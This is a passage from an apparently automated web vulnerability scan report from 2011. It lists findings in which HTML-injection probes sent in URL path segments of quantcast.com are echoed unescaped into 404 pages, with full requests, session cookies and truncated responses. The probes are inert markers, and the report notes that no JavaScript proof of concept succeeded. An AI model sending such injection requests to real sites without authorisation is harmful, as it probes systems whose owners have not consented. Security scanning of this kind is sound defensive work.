This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile/social8ffda"><a>3b68946047a?wunit=wd%3Aorg.craigslist HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.1.10.1297448142; qcVisitor=2|77|1296918427290|15|NOTSET; JSESSIONID=3F6D98FAA44E28DAD1DA690E50F518DB

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile social8ffda"><a>3b68946047a" />
...[SNIP]...

1.142. http://www.quantcast.com/profile/sparklineGraph [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/sparklineGraph

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba624"><a>80a1e961479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profileba624"><a>80a1e961479/sparklineGraph?type=network&wunit=wtpub:pixel/p-85E9Mbo27Crs6&country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|19|NOTSET; JSESSIONID=BAB8858A40256CEFC22DF912A7481AAC

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0BB4254457C96AA8F9B177778516E60C; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profileba624"><a>80a1e961479 sparklineGraph" />
...[SNIP]...

1.143. http://www.quantcast.com/profile/sparklineGraph [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/sparklineGraph

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fedb6<a>d775bd821f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profilefedb6<a>d775bd821f7/sparklineGraph?type=network&wunit=wtpub:pixel/p-85E9Mbo27Crs6&country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|19|NOTSET; JSESSIONID=BAB8858A40256CEFC22DF912A7481AAC

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=03FAC6371FAD81DEAA72F4EDF3FD612F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> profilefedb6<a>d775bd821f7 sparklineGraph</em>
...[SNIP]...

1.144. http://www.quantcast.com/profile/sparklineGraph [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/sparklineGraph

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d378"><a>2cb0dcc674e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile/sparklineGraph4d378"><a>2cb0dcc674e?type=network&wunit=wtpub:pixel/p-85E9Mbo27Crs6&country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|19|NOTSET; JSESSIONID=BAB8858A40256CEFC22DF912A7481AAC

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile sparklineGraph4d378"><a>2cb0dcc674e" />
...[SNIP]...

1.145. http://www.quantcast.com/profile/trafficGraph [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/trafficGraph

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dd84"><a>0bf67e6194c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile8dd84"><a>0bf67e6194c/trafficGraph?wunit=wd%3Acom.hulu&drg=&dty=pp&gl=6mo&reachType=period&dtr=dd&width=522&country=US&ggt=large&showDeleteButtons=true&v=-1248364691 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|19|NOTSET; JSESSIONID=BAB8858A40256CEFC22DF912A7481AAC

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=23061188B8BEFBE2BD00677E39BCF3FC; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile8dd84"><a>0bf67e6194c trafficGraph" />
...[SNIP]...

1.146. http://www.quantcast.com/profile/trafficGraph [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/trafficGraph

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2f24"><a>a24b4ce55e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile/trafficGraphf2f24"><a>a24b4ce55e9?wunit=wd%3Acom.hulu&drg=&dty=pp&gl=6mo&reachType=period&dtr=dd&width=522&country=US&ggt=large&showDeleteButtons=true&v=-1248364691 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|19|NOTSET; JSESSIONID=BAB8858A40256CEFC22DF912A7481AAC

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile trafficGraphf2f24"><a>a24b4ce55e9" />
...[SNIP]...

1.147. http://www.quantcast.com/profile/workHomeGraph [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/workHomeGraph

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecb2c"><a>ca4bad9e152 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profileecb2c"><a>ca4bad9e152/workHomeGraph?type=small&wunit=wd%3Acom.hulu&v=1796953524&country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; JSESSIONID=AE0851A503ED26B36FB0334558696A93; qcVisitor=2|77|1296918427290|20|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2A94F3489D405593729496924DD86D5C; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profileecb2c"><a>ca4bad9e152 workHomeGraph" />
...[SNIP]...

1.148. http://www.quantcast.com/profile/workHomeGraph [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/workHomeGraph

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1b517<a>7e82fed4936 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile1b517<a>7e82fed4936/workHomeGraph?type=small&wunit=wd%3Acom.hulu&v=1796953524&country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; JSESSIONID=AE0851A503ED26B36FB0334558696A93; qcVisitor=2|77|1296918427290|20|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> profile1b517<a>7e82fed4936 workHomeGraph</em>
...[SNIP]...

1.149. http://www.quantcast.com/profile/workHomeGraph [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/workHomeGraph

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec83"><a>5f84b26c180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile/workHomeGraph1ec83"><a>5f84b26c180?type=small&wunit=wd%3Acom.hulu&v=1796953524&country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; JSESSIONID=AE0851A503ED26B36FB0334558696A93; qcVisitor=2|77|1296918427290|20|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile workHomeGraph1ec83"><a>5f84b26c180" />
...[SNIP]...

1.150. http://www.quantcast.com/top-sites-1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/top-sites-1

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a3c1<a>888675e18fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /top-sites-18a3c1<a>888675e18fe?r=19 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.3.8.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|16|NOTSET; JSESSIONID=50DB226CBE7A698B368185EA9DA71272

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9BBDCAA5F468064BDC3DFBA43566D918; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> top-sites-18a3c1<a>888675e18fe</em>
...[SNIP]...

1.151. http://www.quantcast.com/top-sites-1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/top-sites-1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0269"><a>938fa46b3c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /top-sites-1f0269"><a>938fa46b3c7?r=19 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.3.8.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|16|NOTSET; JSESSIONID=50DB226CBE7A698B368185EA9DA71272

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6DD434AEB865A2E9F78F0E8DF165A3E8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" top-sites-1f0269"><a>938fa46b3c7" />
...[SNIP]...

1.152. http://www.quantcast.com/user/widgetImage [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/user/widgetImage

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d4450<a>ae73aec5013 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /userd4450<a>ae73aec5013/widgetImage?domain=hulu.com&widget=9 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; qcVisitor=2|77|1296918427290|22|NOTSET; JSESSIONID=62752451072D3981C24D0EB3AF9F17D7; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.9.8.1297448239075; qcPageID=0

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8404118CC7884EDF4F225B7AB1CDC25B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> userd4450<a>ae73aec5013 widgetImage</em>
...[SNIP]...

1.153. http://www.quantcast.com/user/widgetImage [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/user/widgetImage

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16b1f"><a>c97c1e2e067 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user16b1f"><a>c97c1e2e067/widgetImage?domain=hulu.com&widget=9 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; qcVisitor=2|77|1296918427290|22|NOTSET; JSESSIONID=62752451072D3981C24D0EB3AF9F17D7; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.9.8.1297448239075; qcPageID=0

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E40F004BA5CC33D9E88F4247270FF71A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" user16b1f"><a>c97c1e2e067 widgetImage" />
...[SNIP]...

1.154. http://www.quantcast.com/user/widgetImage [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/user/widgetImage

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf23b"><a>da5033b7489 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/widgetImagebf23b"><a>da5033b7489?domain=hulu.com&widget=9 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
